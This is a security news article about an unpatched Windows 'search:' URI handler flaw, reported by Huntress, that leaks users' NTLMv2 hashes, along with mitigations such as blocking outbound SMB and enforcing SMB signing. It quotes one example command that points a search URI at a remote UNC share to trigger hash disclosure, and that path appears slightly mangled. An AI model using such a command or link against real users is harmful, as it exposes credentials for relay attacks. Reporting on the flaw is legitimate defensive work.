Cybersecurity researchers have identified and disclosed details of an unpatched vulnerability in Windows that allows attackers to steal a user’s NTLMv2 hash. This critical network security flaw, residing within the Windows search URI handler, poses a significant risk by enabling unauthorized access to sensitive user credentials, potentially leading to deeper network compromises. While Microsoft has previously addressed similar issues, this latest discovery highlights an ongoing challenge in securing widely used operating system features.
The vulnerability, tracked by security observers, mirrors a previously patched issue in the Windows Snipping Tool. This new exploit leverages the `search:` URI handler, rather than the `ms-screensketch:` handler of the Snipping Tool. The exploitation process involves tricking a user into clicking a specially crafted link, which then forces their computer to connect to an attacker-controlled server. This connection, according to cybersecurity firm Huntress, facilitates the disclosure of the user’s Net-NTLMv2 hash to the malicious actor.
New NTLMv2 Hash Disclosure Vulnerability Discovered
The newly flagged security flaw operates through a similar mechanism as the earlier Snipping Tool vulnerability, CVE-2026-33829. While CVE-2026-33829 was a spoofing vulnerability patched by Microsoft in April 2026, this new issue exploits the `search:` URI handler to achieve the same outcome: the leakage of an NTLMv2 hash. In the previous case, the `filePath` parameter of the `ms-screensketch:` URI handler was exploited. This time, the `search:` handler, in conjunction with parameters like `crumb=location:`, is used to achieve the hash disclosure.
According to research from Huntress, the exploited command structure facilitates the triggering of NTLM authentication. An example command provided shows the potential incursion: `start “” “search:query=test&crumb=location:\10.0.1.100share”`. This command, when executed by a user, directs the system to engage with a Universal Naming Convention (UNC) path, thereby initiating an NTLM authentication exchange that can be intercepted by an attacker. The `crumb` parameter’s role in similar hash-stealing attacks, such as CVE-2023-35636, was documented by Varonis in February 2024, further contextualizing this discovery.
Implications of the NTLMv2 Hash Leak
The potential impact of a successful NTLMv2 hash interception is substantial. Once an attacker obtains a user’s NTLMv2 hash, they can utilize it for relay attacks. These attacks allow the threat actor to impersonate the authenticated user and gain unauthorized access to internal network resources. The severity of this vulnerability is categorized as Moderate, as indicated by its similarities to previous exploits that carried the same rating.
Microsoft has reportedly declined to address this specific issue, citing that only “Important and Critical severity cases meet our bar for servicing.” This stance was communicated following a responsible disclosure of the vulnerability on April 15, 2026. In the absence of an official patch from Microsoft, organizations are advised to implement mitigating controls. These include blocking outbound SMB traffic (TCP ports 445 and 139) on systems where it is not strictly necessary. Additionally, enforcing SMB signing can prevent captured hashes from being used in relay attacks against internal services, and disabling NTLM authentication where feasible can further harden network defenses.
The continued discovery of such vulnerabilities underscores the persistent threat landscape and the ongoing need for robust cybersecurity practices. As this NTLMv2 hash disclosure issue remains unpatched, the onus falls on network administrators to proactively implement the recommended workarounds. The cybersecurity community will be monitoring for any future developments or potential declarations of a higher severity by Microsoft, should wider exploitation or impact be demonstrated.